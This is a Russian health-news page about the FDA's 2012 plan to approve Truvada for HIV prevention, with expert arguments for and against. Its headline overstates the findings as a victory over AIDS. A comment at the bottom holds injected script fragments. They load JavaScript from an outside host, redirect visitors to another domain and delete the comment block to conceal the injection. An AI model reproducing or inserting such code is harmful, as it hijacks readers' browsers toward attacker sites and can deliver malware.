Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Создано первое в мире лек...  >>  Создано первое в мире лекарство для предупреждения СПИДа. Похоже, мы победили эту болезнь!
 
Обратная связь
 

Создано первое в мире лекарство для предупреждения СПИДа. Похоже, мы победили эту болезнь!

Размер шрифта
13 июня 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Управление США по надзору за качеством пищевых продуктов и лекарственных средств (FDA) планирует зарегистрировать препарат Трувада для профилактики ВИЧ-инфекции у людей с высоким риском заражения.

Что такое ВИЧ-инфекция

ВИЧ-инфекция – вирусное заболевание, возбудителем которого является вирус иммунодефицита человека (ВИЧ). ВИЧ-инфекция протекает в несколько стадий, последняя из которых носит название синдром приобретенного иммунодефицита (СПИД).

ВИЧ воздействует на определенные клетки иммунной системы, вызывая их гибель. Нарушение работы иммунной системы ведет к развитию различных инфекций и опухолей, которые в конечном итоге приводят к гибели пациента. Заражение ВИЧ-инфекцией может произойти при половом контакте, переливании крови, пересадке органов и тканей.

Кому нужна профилактика ВИЧ-инфекции

По мнению FDA высокий риск заражения имеют:

  • мужчины, вступающие в половой контакт с мужчинами;
  • люди, вступающие в половой контакт с ВИЧ-инфицированными;
  • другие люди, которые могут заразиться ВИЧ-инфекцией при половом контакте.

Что такое Трувада

Трувада – это лекарственный препарат, который выпускается в форме таблеток. Каждая таблетка Трувада – это комбинация двух препаратов (Эмтрива и Виреад). Механизм действия Трувада заключается в том, что он блокирует вещество, которое необходимо для размножения вируса.

Препарат используется для лечения ВИЧ-инфекции у инфицированных больных, начиная с 2004 г. В настоящее время он уже применяется для предупреждения ВИЧ-инфекции у людей с высоким риском заражения (например, у мужчин, вступающих в половой контакт с мужчинами), однако, это показание еще не зарегистрировано.

Мнение экспертов

Эксперты относятся к регистрации нового показания для применения Трувада неоднозначно. С одной стороны, в ряде исследований доказано, что использование препарата снижает риск развития инфекции на 75%. С другой стороны, существует опасение, что регистрация препарата для профилактики ВИЧ-инфекции может привести к сокращению использования презервативов.

Сторонники регистрации считают, что Трувада будет хорошим дополнением к другим мерам по сдерживанию эпидемии СПИДа.

– Клинические данные и результаты нескольких клинических исследований свидетельствуют о том, что Трувада защищает от заражения ВИЧ-инфекцией. Наша организация поддерживает использование Трувада для профилактики заболевания, – рассказывает политический директор организации AIDS United Уильям Макколл (William McColl).

Противники регистрации полагают, что применение Трувада для профилактики ВИЧ-инфекции не только не даст положительных результатов, но и будет иметь негативные последствия.

– Наша организация выступает против регистрации Трувада для профилактики ВИЧ-инфекции, – говорит глава организации AIDS Healthcare Foundation Майкл Вайнштейн. – Убедительные доказательства эффективности препарата в качестве средства профилактики отсутствуют. Кроме того, появление подобного препарата может дать людям ложное чувство безопасности. Они перестанут пользоваться презервативами, и количество инфицированных увеличится.

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все что вы хотели знать о презервативах   Всемирная неделя первичного иммунодефицита начинается в Москве!   Как не стать жертвой голубей-убийц?!   В России появились клинические рекомендации по терапии больных первичным иммунодефицитом  
10 сентября 2012Одобрено лекарство для профилактики ВИЧ-инфекции! 24 августа 2012Домашний тест на ВИЧ
 
12 июля 2012Грудное молоко предотвращает передачу ВИЧ 14 февраля 2012Новую вакцину против ВИЧ-инфекции протестировали на людях
 

Слайдшоу

Все факты и мифы о ВИЧ Жизнь с диагнозом ВИЧ или СПИД: правда и вымыслы
Факты о заболеваниях, передающиеся половым путем Обследования для женщин
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.